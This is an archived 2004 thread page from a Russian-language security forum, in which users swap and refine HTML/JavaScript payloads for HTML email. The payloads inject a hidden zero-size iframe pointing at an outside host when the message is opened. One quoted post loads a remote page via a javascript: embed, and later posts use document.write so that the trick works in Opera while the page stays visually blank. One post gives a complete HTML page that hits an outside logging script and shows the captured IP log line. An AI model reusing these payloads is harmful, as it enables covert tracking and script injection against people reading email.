ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > E-Mail
Перезагрузить страницу про статью на сайте
   
 
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 29.07.2004, 18:06
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июля 21 2004,15:19)</td></tr><tr><td id="QUOTE">я отправил на тестовый мыльник письмо в html виде с кодом </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><embed src="javascript:status=location;document.getElemen tById('xxx').innerHTML='<iframe src=http://asdfg178.narod.ru/jopa.html width=0 height=0></iframe>';this.wav" width=0 height=0> <p id='xxx'>[/QUOTE]<span id='postcolor'>
тока нихрена не работает [/QUOTE]<span id='postcolor'>
Ну во-первых у тебя &lt;iframe&gt; не заменен спец.символами. Поэтому он будет смотерться как &lt;xiframe&gt;.
Во-вторых getElementById объект DOM поддерживается ТОЧНО, только IE, насчет NN не знаю. А вот знаю что не поддерживается Оперой(хотя, бывают новые версии)). Для оперы можно сделать document.write, но тогда вся конспирация летит к чертям)
 

  #12  
Старый 01.08.2004, 08:54
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
Отправить сообщение для zFailure с помощью ICQ
По умолчанию
как насчет такого
document.write(document.body.innerHTML+'&lt;'+'scr ipt'+'&gt;alert();&lt;'+'/script'+'&gt;');

здесь и document.write и сохраняем конспирацию
 

  #13  
Старый 01.08.2004, 19:59
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию
zFailure
Все равно ты используешь код, который не поддерживается Оперой. По поаводу document.write имелось ввиду следующее:
document.write('&lt;iframe&gt;&lt;/iframe&gt;&#39;
тогда будет срабатывать на люой платформе, но при открытии письма - визуально чистая страница
 

  #14  
Старый 02.08.2004, 12:56
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
Отправить сообщение для zFailure с помощью ICQ
По умолчанию
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=WINDOWS-1251">
<title>Untitled</title>
</head>

<body onLoad="document.write(document.body.innerHTML+'<i frame src=http://antichat.ru/cgi-bin/s.jpg?test width=0 height=0 style=display:none;></iframe>')">

1234567890

</body>
</html>[/QUOTE]<span id='postcolor'>

этот код был вызван мною в Opera 7.53

в итоге
[Mon Aug 2 12:53:46 2004] IP=XXX.XXX.XXX.XXX REFERER= QUERY=test
 

  #15  
Старый 03.08.2004, 19:13
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию
zFailure... и то верно. весьма и весьма.. хехе)
Кстати, навскидку, так, не знаешь, &lt;iframe&gt; сейчас поддерживается nentscape'ом? не наду дистрибов что-то пока..
В скором времени отпишу сюда ещще кое-что, давольно интересная тема недавно была)
 
 
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ